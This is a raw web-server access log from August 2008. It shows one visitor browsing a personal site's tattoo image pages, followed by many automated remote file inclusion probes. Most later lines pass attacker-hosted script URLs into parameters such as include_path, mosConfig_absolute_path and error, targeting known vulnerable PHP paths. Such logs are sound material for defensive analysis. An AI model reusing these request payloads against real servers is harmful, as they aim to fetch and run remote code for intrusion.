24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:12 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:17 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:26 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
66.216.91.226 - - [17/Aug/2008:05:09:32 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.216.91.226 - - [17/Aug/2008:05:09:32 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.216.91.226 - - [17/Aug/2008:05:09:33 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../id5.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:38 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:46 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:47 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:47 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:47 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:09:47 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:10:00 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:10:01 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:10:01 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:10:01 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
24.80.168.236 - - [17/Aug/2008:05:10:05 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
74.52.66.242 - - [17/Aug/2008:05:10:16 -0500] "GET /logs/access_log.1213488000///vwar/backup/errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.812"
86.58.154.237 - - [17/Aug/2008:05:11:10 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:05:11:11 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:05:11:12 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.55.113.226 - - [17/Aug/2008:05:11:55 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
83.172.140.17 - - [17/Aug/2008:05:11:55 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
74.55.113.226 - - [17/Aug/2008:05:11:55 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
83.172.140.17 - - [17/Aug/2008:05:11:55 -0500] "GET /errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
74.55.113.226 - - [17/Aug/2008:05:11:55 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
83.172.140.17 - - [17/Aug/2008:05:11:55 -0500] "GET /logs/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:12:14 -0500] "GET /logs/access_log.1214179200//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
72.52.212.40 - - [17/Aug/2008:05:12:35 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
72.52.212.40 - - [17/Aug/2008:05:12:35 -0500] "GET //include/admin.lib.inc.php?site_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.811"
89.248.110.152 - - [17/Aug/2008:05:13:31 -0500] "GET /logs//admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:13:31 -0500] "GET //admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:13:35 -0500] "GET /logs/access_log.1206230400//admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:13:35 -0500] "GET /logs/access_log.1209600000//admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:13:42 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:13:43 -0500] "GET //Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:17:42 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:17:42 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://64.251.8.142/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.251.80.230 - - [17/Aug/2008:05:18:54 -0500] "GET //admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:18:54 -0500] "GET /logs//admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:18:57 -0500] "GET /logs/access_log.1209600000//admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.172.140.17 - - [17/Aug/2008:05:19:57 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
86.58.154.237 - - [17/Aug/2008:05:20:50 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:22:14 -0500] "GET /logs/access_log.1208044800//admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
77.240.226.168 - - [17/Aug/2008:05:23:04 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
77.240.226.168 - - [17/Aug/2008:05:23:08 -0500] "GET //skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
77.240.226.168 - - [17/Aug/2008:05:23:09 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
83.172.140.17 - - [17/Aug/2008:05:24:00 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
74.55.113.226 - - [17/Aug/2008:05:25:36 -0500] "GET /logs/access_log.1214438400/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
204.13.169.42 - - [17/Aug/2008:05:25:40 -0500] "GET /pagina.php?page=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
204.13.169.42 - - [17/Aug/2008:05:25:40 -0500] "GET /logs/pagina.php?page=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
86.58.154.237 - - [17/Aug/2008:05:25:57 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
89.248.110.152 - - [17/Aug/2008:05:26:10 -0500] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:26:10 -0500] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.240.226.168 - - [17/Aug/2008:05:27:32 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
77.240.226.168 - - [17/Aug/2008:05:27:36 -0500] "GET //skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
77.240.226.168 - - [17/Aug/2008:05:27:37 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
89.248.110.152 - - [17/Aug/2008:05:27:53 -0500] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:27:53 -0500] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.240.226.168 - - [17/Aug/2008:05:28:30 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
86.58.154.237 - - [17/Aug/2008:05:28:42 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
203.251.80.230 - - [17/Aug/2008:05:29:10 -0500] "GET //admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.248.110.152 - - [17/Aug/2008:05:31:57 -0500] "GET /logs//include/write.php?dir=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:31:57 -0500] "GET //include/write.php?dir=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.240.226.168 - - [17/Aug/2008:05:33:40 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
74.55.113.226 - - [17/Aug/2008:05:34:54 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.61.106.55 - - [17/Aug/2008:05:34:59 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:05:34:59 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:05:36:59 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:05:36:59 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
89.248.110.152 - - [17/Aug/2008:05:37:28 -0500] "GET //admin.php?include_path=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.55.113.226 - - [17/Aug/2008:05:38:10 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.6.22.107 - - [17/Aug/2008:05:38:23 -0500] "GET /logs/access_log.1214870400 HTTP/1.0" 200 481923 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
151.11.24.250 - - [17/Aug/2008:05:39:30 -0500] "GET /?sourcedir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
151.11.24.250 - - [17/Aug/2008:05:39:36 -0500] "GET /logs/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt??? HTTP/1.1" 200 95581 "-""libwww-perl/5.79"
89.218.85.18 - - [17/Aug/2008:05:39:54 -0500] "GET /logs/access_log.1214438400//config/dbutil.bck.php?confdir=http://64.251.8.142/safe.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:05:40:17 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:05:40:17 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:05:40:18 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:40:36 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:40:36 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://64.251.8.142/safe.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
74.6.22.107 - - [17/Aug/2008:05:40:48 -0500] "GET /logs/access_log.1165536000 HTTP/1.0" 200 213217 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.248.110.152 - - [17/Aug/2008:05:41:48 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.248.110.152 - - [17/Aug/2008:05:41:48 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://gillbott1.netfirms.com/bbs//skin/zero_vote/mraneti.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
74.55.113.226 - - [17/Aug/2008:05:42:13 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.55.113.226 - - [17/Aug/2008:05:42:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:43:18 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://64.251.8.142/safe.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:43:19 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://64.251.8.142/safe.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [17/Aug/2008:05:43:20 -0500] "GET /logs/access_log.1208044800//Neos_Chronos/header.php?base_folder=http://64.251.8.142/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
